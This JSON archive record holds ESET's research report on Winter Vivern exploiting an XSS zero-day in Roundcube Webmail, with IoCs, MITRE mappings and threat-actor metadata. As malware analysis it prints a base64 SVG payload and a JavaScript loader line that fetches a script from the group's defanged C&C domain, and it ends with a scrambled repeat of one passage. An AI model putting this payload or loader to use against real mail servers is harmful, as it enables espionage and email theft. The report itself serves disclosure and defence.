{ "id": "86ff1bf6-7b57-476c-b4ef-61c8dcea0f07", "created_at": "2026-04-06T00:12:20.77362Z", "updated_at": "2026-04-10T03:37:50.101609Z", "deleted_at": null, "sha1_hash": "43285fb6c2df8046dbc4021ed2cf995f92b8e272", "title": "Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1129214, "plain_text": "Winter Vivern exploits zero-day vulnerability in Roundcube Webmail\r\nservers\r\nBy Matthieu Faou\r\nArchived: 2026-04-05 17:02:13 UTC\r\nESET Research\r\nESET Research recommends updating Roundcube Webmail to the latest available version as soon as possible\r\n25 Oct 2023  •  , 5 min. read\r\nESET Research has been closely tracking the cyberespionage operations of Winter Vivern for more than a year and, during\r\nour routine monitoring, we found that the group began exploiting a zero-day XSS vulnerability in the Roundcube Webmail\r\nserver on October 11\r\nth\r\n, 2023. This is a different vulnerability than CVE-2020-35730, which was also exploited by the group\r\naccording to our research.\r\nAccording to ESET telemetry data, the campaign targeted Roundcube Webmail servers belonging to governmental entities\r\nand a think tank, all in Europe.\r\nVulnerability disclosure timeline:\r\n2023-10-12: ESET Research reported the vulnerability to the Roundcube team.\r\n2023-10-14: The Roundcube team responded and acknowledged the vulnerability.\r\n2023-10-14: The Roundcube team patched the vulnerability.\r\n2023-10-16: The Roundcube team released security updates to address the vulnerability (1.6.4, 1.5.5, and\r\n1.4.15).\r\n2023-10-18: ESET CNA issues a CVE for the vulnerability (CVE-2023-5631).\r\n2023-10-25: ESET Research blogpost published.\r\nhttps://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/\r\nPage 1 of 7\n\nWe would like to thank the Roundcube developers for their quick reply and for patching the vulnerability in such a short\r\ntime frame.\r\nWinter Vivern profile\r\nWinter Vivern is a cyberespionage group first revealed by DomainTools in 2021. It is thought to have been active since at\r\nleast 2020 and it targets governments in Europe and Central Asia. To compromise its targets, the group uses malicious\r\ndocuments, phishing websites, and a custom PowerShell backdoor (see the articles from the State Cyber Protection Centre\r\nof Ukraine and from SentinelLabs). We believe with low confidence that Winter Vivern is linked to MoustachedBouncer, a\r\nsophisticated Belarus-aligned group that we first published about in August, 2023.\r\nWinter Vivern has been targeting Zimbra and Roundcube email servers belonging to governmental entities since at least\r\n2022 – see this article from Proofpoint. In particular, we observed that the group exploited CVE-2020-35730, another XSS\r\nvulnerability in Roundcube, in August and September 2023. Note that Sednit (also known as APT28) is exploiting this old\r\nXSS vulnerability in Roundcube as well, sometimes against the same targets.\r\nTechnical details\r\nExploitation of the XSS vulnerability, assigned CVE-2023-5631, can be done remotely by sending a specially crafted email\r\nmessage. In this Winter Vivern campaign, the emails were sent from team.managment@outlook[.]com and had the subject\r\nGet started in your Outlook, as shown in Figure 1.\r\nhttps://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/\r\nPage 2 of 7\n\nFigure 1. Malicious email message\nAt first sight, the email doesn’t seem malicious – but if we examine the HTML source code, shown in Figure 2, we can see\nan SVG tag at the end, which contains a base64-encoded payload.\nFigure 2. Email message with a malicious SVG tag\nOnce we decode the base64-encoded value in the href attribute of the use tag, we have:\n![SVG Image](data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGlkPSJ4Ij4gPGltYWdlIGhyZWY9IngiIG9uZXJyb3I9ImV2YWwoYXRvYignJmx0O2Jhc2U2NC1lbmNvZGVkIHBheWxvYWQmZ3Q7JykpIiAvPgo8L3N2Zz4=) As the x value argument of the href attribute is not a valid URL, this object’s onerror attribute will be activated. Decoding\nthe payload in the onerror attribute gives us the following JavaScript code (with the malicious URL manually defanged),\nwhich will be executed in the browser of the victim in the context of their Roundcube session:\nvar\nfe=document.createElement('script');fe.src=\"https://recsecas[.]com/controlserver/checkupdate.js\";document.body.appendChild(fe);\nSurprisingly, we noticed that the JavaScript injection worked on a fully patched Roundcube instance. It turned out that this\nwas a zero-day XSS vulnerability affecting the server-side script rcube_washtml.php, which doesn’t properly sanitize the\nmalicious SVG document before being added to the HTML page interpreted by a Roundcube user. We reported it to\nRoundcube and it was patched on October 14th, 2023 (see this commit). The vulnerability affects Roundcube versions 1.6.x\nbefore 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15.\nhttps://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/\nPage 3 of 7\n\nIn summary, by sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context\r\nof the Roundcube user’s browser window. No manual interaction other than viewing the message in a web browser is\r\nrequired.\r\nThe second stage is a simple JavaScript loader named checkupdate.js and is shown in Figure 3.\r\nFigure 3. JavaScript loader\r\nThe final JavaScript payload – shown in Figure 4 – is able to list folders and emails in the current Roundcube account, and\r\nto exfiltrate email messages to the C\u0026C server by making HTTP requests to\r\nhttps://recsecas[.]com/controlserver/saveMessage.\r\nFigure 4. Final JavaScript payload exfiltrating email messages from the Roundcube account (part of the\r\nobfuscated script removed for clarity)\r\nConclusion\r\nWinter Vivern has stepped up its operations by using a zero-day vulnerability in Roundcube. Previously, it was using known\r\nvulnerabilities in Roundcube and Zimbra, for which proofs of concept are available online.\r\nDespite the low sophistication of the group’s toolset, it is a threat to governments in Europe because of its persistence, very\r\nregular running of phishing campaigns, and because a significant number of internet-facing applications are not regularly\r\nupdated although they are known to contain vulnerabilities.\r\nhttps://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/\r\nPage 4 of 7\n\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit\r\nthe ESET Threat Intelligence page.\r\nIoCs\r\nFiles\r\nSHA-1 Filename Detection Description\r\n97ED594EF2B5755F0549C6C5758377C0B87CFAE0 checkupdate.js JS/WinterVivern.B JavaScript loader.\r\n8BF7FCC70F6CE032217D9210EF30314DDD6B8135 N/A JS/Kryptik.BIK\r\nJavaScript payload exfiltratin\r\nemails in Roundcube.\r\nNetwork\r\nIP Domain Hosting provider First seen Details\r\n38.180.76[.]31 recsecas[.]com M247 Europe SRL 2023-09-28 Winter Vivern C\u0026C server\r\nEmail addresses\r\nteam.managment@outlook[.]com\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 13 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nResource\r\nDevelopment\r\nT1583.001\r\nAcquire Infrastructure:\r\nDomains\r\nWinter Vivern operators bought a domain at\r\nRegistrar.eu.\r\nT1583.004\r\nAcquire Infrastructure:\r\nServer\r\nWinter Vivern operators rented a server at M247.\r\nT1587.004\r\nDevelop Capabilities:\r\nExploits\r\nWinter Vivern operators probably developed an exploit\r\nfor Roundcube.\r\nhttps://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/\r\nPage 5 of 7\n\nTactic ID Name Description\r\nInitial Access\r\nT1190\r\nExploit Public-Facing\r\nApplication\r\nWinter Vivern sent an email exploiting CVE‑2023-\r\n5631 in Roundcube.\r\nT1566 Phishing\r\nThe vulnerability is triggered via a phishing email,\r\nwhich should be opened in the Roundcube webmail by\r\nthe victim.\r\nExecution T1203\r\nExploitation for Client\r\nExecution\r\nThe JavaScript payload is executed by an XSS\r\nvulnerability in Roundcube.\r\nDiscovery T1087.003\r\nAccount Discovery:\r\nEmail Account\r\nThe JavaScript payload can list folders in the email\r\naccount.\r\nCollection T1114.002\r\nEmail Collection:\r\nRemote Email Collection\r\nThe JavaScript payload can exfiltrate emails from the\r\nRoundcube account.\r\nCommand and\r\nControl\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web Protocols\r\nC\u0026C communications use HTTPs.\r\nExfiltration T1041\r\nExfiltration Over C2\r\nChannel\r\nExfiltration is done via HTTPs and to the same C\u0026C\r\nserver.\r\nLet us keep you\r\nup to date\r\nSign up for our newsletters\r\nhttps://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/\r\nPage 6 of 7\n\nSource: https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/\r\nhttps://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/\r\nPage 7 of 7\n\nmalicious SVG document Roundcube and it was before being added patched on October to the HTML page 14th , 2023 (see this interpreted by a Roundcube commit). The vulnerability user. We affects Roundcube reported it to versions 1.6.x\nbefore 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15. \n Page 3 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "MITRE", "Malpedia" ], "references": [ "https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/" ], "report_names": [ "winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers" ], "threat_actors": [ { "id": "23226bab-4c84-4c65-a8d1-7ac10c44b172", "created_at": "2023-04-27T02:04:45.463683Z", "updated_at": "2026-04-10T02:00:04.980143Z", "deleted_at": null, "main_name": "Winter Vivern", "aliases": [ "TA473", "TAG-70", "UAC-0114", "UNC4907" ], "source_name": "ETDA:Winter Vivern", "tools": [ "APERETIF" ], "source_id": "ETDA", "reports": null }, { "id": "821cb2ce-472c-438f-943d-19cf23204d9a", "created_at": "2023-11-01T02:01:06.683709Z", "updated_at": "2026-04-10T02:00:05.39433Z", "deleted_at": null, "main_name": "MoustachedBouncer", "aliases": [ "MoustachedBouncer" ], "source_name": "MITRE:MoustachedBouncer", "tools": [ "SharpDisco" ], "source_id": "MITRE", "reports": null }, { "id": "7d9d90f3-001e-4adc-8a77-8f93b5d02b01", "created_at": "2023-09-07T02:02:47.575324Z", "updated_at": "2026-04-10T02:00:04.770856Z", "deleted_at": null, "main_name": "MoustachedBouncer", "aliases": [], "source_name": "ETDA:MoustachedBouncer", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "e6704f3c-15d7-4e1d-b5a8-e33e7e9bd925", "created_at": "2023-11-04T02:00:07.660461Z", "updated_at": "2026-04-10T02:00:03.385093Z", "deleted_at": null, "main_name": "Winter Vivern", "aliases": [ "TA-473", "UAC-0114", "TA473", "TAG-70" ], "source_name": "MISPGALAXY:Winter Vivern", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "0e74afe0-92c3-4fca-93a4-d8e51180e105", "created_at": "2023-08-11T02:00:11.229735Z", "updated_at": "2026-04-10T02:00:03.37095Z", "deleted_at": null, "main_name": "MoustachedBouncer", "aliases": [], "source_name": "MISPGALAXY:MoustachedBouncer", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a20598c1-894c-4173-be6e-64a1ce9732bd", "created_at": "2024-11-01T02:00:52.652891Z", "updated_at": "2026-04-10T02:00:05.375678Z", "deleted_at": null, "main_name": "Winter Vivern", "aliases": [ "Winter Vivern", "TA473", "UAC-0114" ], "source_name": "MITRE:Winter Vivern", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434340, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/43285fb6c2df8046dbc4021ed2cf995f92b8e272.pdf", "text": "https://archive.orkl.eu/43285fb6c2df8046dbc4021ed2cf995f92b8e272.txt", "img": "https://archive.orkl.eu/43285fb6c2df8046dbc4021ed2cf995f92b8e272.jpg" } }